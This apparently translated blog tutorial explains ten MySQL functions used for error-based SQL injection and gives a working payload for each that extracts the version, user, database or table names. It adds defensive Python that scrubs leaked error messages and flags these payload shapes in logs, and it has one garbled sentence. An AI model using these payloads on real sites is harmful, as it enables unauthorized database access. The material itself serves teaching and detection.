Ten MySQL functions used for error-based injection

1.Floor()

round() rounds the original value to the specified number of decimal places, e.g. round(1.45,0) = 1; round(1.55,0) = 2
floor() rounds down to the specified number of decimal places, e.g. floor(1.45,0) = 1; floor(1.55,0) = 1
ceiling() rounds up to the specified number of decimal places, e.g. ceiling(1.45,0) = 2; ceiling(1.55,0) = 2

floor (x), returns the largest integer less than or equal to x.

Here x stands for concat(database(), rand(0)*2). rand(0) uses 0 as the random seed and generates a random number between 0 and 1; multiplying by 2 gives a random number between 0 and 2.

Cause of the error: a duplicate primary key. Required elements: count(), rand(), group by.

payload:

id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.ExtractValue()

ExtractValue(xml_frag, xpath_expr): ExtractValue() accepts two string arguments, a fragment of XML markup xml_frag and an XPath expression xpath_expr (also called a locator); it returns the text (CDATA) of the text node that is a child of the element matched by the XPath expression.

The first parameter is the target XML content; the second parameter is the path to search for, written in XPath syntax.

For example: SELECT ExtractValue('<a><b/></a>', '/a/b'); looks up the b node under the a node in the XML fragment passed as the first argument. If the XPath expression is syntactically invalid, the function raises an error. That behaviour is what is used here to obtain the information we want.

payload:

id=1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 1)));

3.UpdateXml()

UPDATEXML(XML_document, XPath_string, new_value);

The first argument: XML_document, a string; the name of the XML document object, called Doc in this text.

The second argument: XPath_string, a string in XPath format. If you are not familiar with XPath syntax, tutorials are available online.

The third argument: new_value, a string that replaces the data that was found.

Our injection statement is:

id=1 and 1=(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))

Here concat() joins its arguments into a single string that does not conform to the XPath_string format, so a syntax error is raised that contains the value:

ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

4.Exp()

exp() is the exponential function with base e:

mysql> select exp(1);
+-------------------+
| exp(1)            |
+-------------------+
| 2.718281828459045 |
+-------------------+
1 row in set (0.00 sec)

However, large arguments overflow. The function overflows and raises an error when the argument is greater than 709.

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

Bitwise negation of 0 returns "18446744073709551615". Because a function returns 0 when it executes successfully, negating a successfully executed function yields the maximum unsigned BIGINT value.

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec) 


mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

Passing the bitwise negation of a subquery to exp() causes a DOUBLE overflow error, and the error message discloses the data.

mysql> select exp(~(select * from(select database())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `x`.`database()` from (select database() AS `database()`) `x`)))'

In a scripting language, part of the expression in the error message is converted to the corresponding string, like this:

DOUBLE value is out of range in 'exp(~((select 'error_based_hpf' from dual)))'

This is how the error-based injection is achieved.

payload:

id=1 and exp(~(select * from(select user())a));
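The techniques above disclose data only when the application returns the raw MySQL error text to the client. As an added example (not part of the original post), the following Python code finds those error messages in a response body and replaces them with a generic message; the function names and sample bodies are constructed for illustration.

```python
import re

# MySQL error texts quoted on this page, plus the duplicate-key message
# (ER_DUP_ENTRY) that the floor()/rand()/group by technique produces.
# Group 1 is the text the server echoed back inside the message.
LEAK_PATTERNS = {
    "xpath-syntax-error": re.compile(r"XPATH syntax error: '(.*?)'"),
    "double-out-of-range": re.compile(r"DOUBLE value is out of range in '(.*)'"),
    "duplicate-entry": re.compile(r"Duplicate entry '(.*?)' for key"),
}

def find_leaks(body):
    """Return [(signature, echoed_text)] for raw MySQL errors in a response body."""
    hits = []
    for name, pattern in LEAK_PATTERNS.items():
        for match in pattern.finditer(body):
            hits.append((name, match.group(1)))
    return hits

def scrub(body, generic="An internal error occurred."):
    """Replace every line that carries a raw MySQL error with a generic message."""
    return "\n".join(
        generic if find_leaks(line) else line for line in body.splitlines()
    )

# Constructed response bodies; the error strings reuse the ones shown above.
SAMPLE_BODIES = [
    "<h1>Product 1</h1>\n<p>In stock</p>",
    "<h1>Error</h1>\nXPATH syntax error: ':root@localhost'",
    "Warning: DOUBLE value is out of range in "
    "'exp(~((select 'error_based_hpf' from dual)))'",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(find_leaks(body), "->", repr(scrub(body)))
```

A hit from find_leaks() in production traffic means database errors are reaching users; the durable fix is parameterized queries together with generic error pages.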

5.GeometryCollection()

GeometryCollection stores geometry as points: a single point is represented directly by its coordinates (x, y), while a line made up of several points uses LINESTRING() to hold the points on that line.

payload:

id=1 and GeometryCollection((select * from(select * from(select user())a)b));

6.Polygon()

The Polygon function draws straight lines between two or more vertices to form a polygon, outlines it with the current pen, and fills it with the current brush and polygon fill mode.

As shown in the figure:

  1. Figure 1 is a Polygon instance whose boundary is defined by an outer ring.
  2. Figure 2 is a Polygon instance whose boundary is defined by an outer ring and two inner rings. The area inside the inner rings is part of the exterior of the Polygon instance.
  3. Figure 3 is a valid Polygon instance, because its inner rings intersect at a single tangent point.

payload:

id =1 and polygon((select * from(select * from(select user())a)b));

This point can be appreciated that the injection point after injection to limit

7.MultiPoint

MultiPoint is a collection of zero or more points. The boundary of a MultiPoint instance is empty.

payload:

id = 1 and multipoint((select * from(select * from(select user())a)b));

8.MultiLineString()

MultiLineString is a collection of zero or more geometry or geography LineString instances.

As shown in the figure:

  • Figure 1 shows a simple MultiLineString instance whose boundary is the four endpoints of its two LineString elements.
  • Figure 2 shows a simple MultiLineString instance, because only the endpoints of the LineString elements intersect. The boundary is the two non-overlapping endpoints.
  • Figure 3 shows a non-simple MultiLineString instance, because the interior of one of its LineString elements is intersected. The boundary of this MultiLineString instance is the four endpoints.
  • Figure 4 shows a simple, non-closed MultiLineString instance.
  • Figure 5 shows a simple, non-closed MultiLineString. It is not closed because its LineString elements are not closed. It is simple because the interiors of its LineString instances do not intersect.
  • Figure 6 shows a simple, closed MultiLineString instance. It is closed because all of its elements are closed. It is simple because none of its elements intersect in their interiors.

payload:

id = 1 and multilinestring((select * from(select * from(select user())a)b));

9.LineString

LineString is a one-dimensional object that represents a sequence of points and the line segments connecting them.

As shown in the figure:

  • Figure 1 shows a simple, non-closed LineString instance.
  • Figure 2 shows a simple, non-closed LineString instance.
  • Figure 3 shows a closed, simple LineString instance, which is therefore a ring.
  • Figure 4 shows a closed, non-simple LineString instance, which is therefore not a ring.

payload:

id = 1 and LINESTRING((select * from(select * from(select user())a)b));

10.MultiPolygon()

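MultiPolygon is a collection of zero or more Polygon instances.

As shown in the figure:

  • Figure 1 is a MultiPolygon instance containing two Polygon elements. The boundary is defined by two outer rings and three inner rings.
  • Figure 2 is a Polygon instance containing two MultiPolygon elements. The boundary is defined by two outer rings and three inner rings. The two Polygon elements intersect at a tangent point.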
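The payloads listed on this page fall into four shapes: floor(rand()) with group by, the two XPath functions, exp() applied to a bitwise negation, and a geometry constructor wrapped around a subquery. As an added example (not part of the original post), this Python code flags those shapes in the query strings of web access logs; the rule names, function names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

GEOMETRY = ("geometrycollection|multipolygon|multilinestring|"
            "multipoint|linestring|polygon")

# One rule per payload shape listed on this page (rule names are made up here).
RULES = [
    ("floor-rand-group-by",
     re.compile(r"\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b")),
    ("xpath-function", re.compile(r"\b(?:extractvalue|updatexml)\s*\(")),
    ("exp-bitwise-not", re.compile(r"\bexp\s*\(\s*~")),
    ("geometry-subquery",
     re.compile(r"\b(?:%s)\s*\(\s*\(\s*select\b" % GEOMETRY)),
]

def classify(value):
    """Return the names of the rules matched by one decoded parameter value."""
    text = re.sub(r"\s+", " ", value.lower())
    return [name for name, pattern in RULES if pattern.search(text)]

def scan_query(query_string):
    """Map each flagged parameter of a URL query string to the rules it hit."""
    flagged = {}
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        hits = classify(value)
        if hits:
            flagged[name] = hits
    return flagged

# Constructed query strings, as they would appear in a web access log.
SAMPLE_QUERIES = [
    "id=1%20AND%201=(UpdateXML(1,concat(0x7e,(SELECT%20@@version),0x7e),1))",
    "id=1+and+Polygon+(+(select+*+from(select+*+from(select+user())a)b))",
    "id=1+and+exp(~(select+*+from(select+user())a))",
    "q=polygon+(shape)&sort=floor(price)&page=2",
]

if __name__ == "__main__":
    for query in SAMPLE_QUERIES:
        print(scan_query(query) or "clean", "<-", query)
```

The geometry rule requires a subquery directly inside the constructor, so ordinary text such as "polygon (shape)" in the last sample is not flagged.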


Origin www.cnblogs.com/zztac/p/11441292.html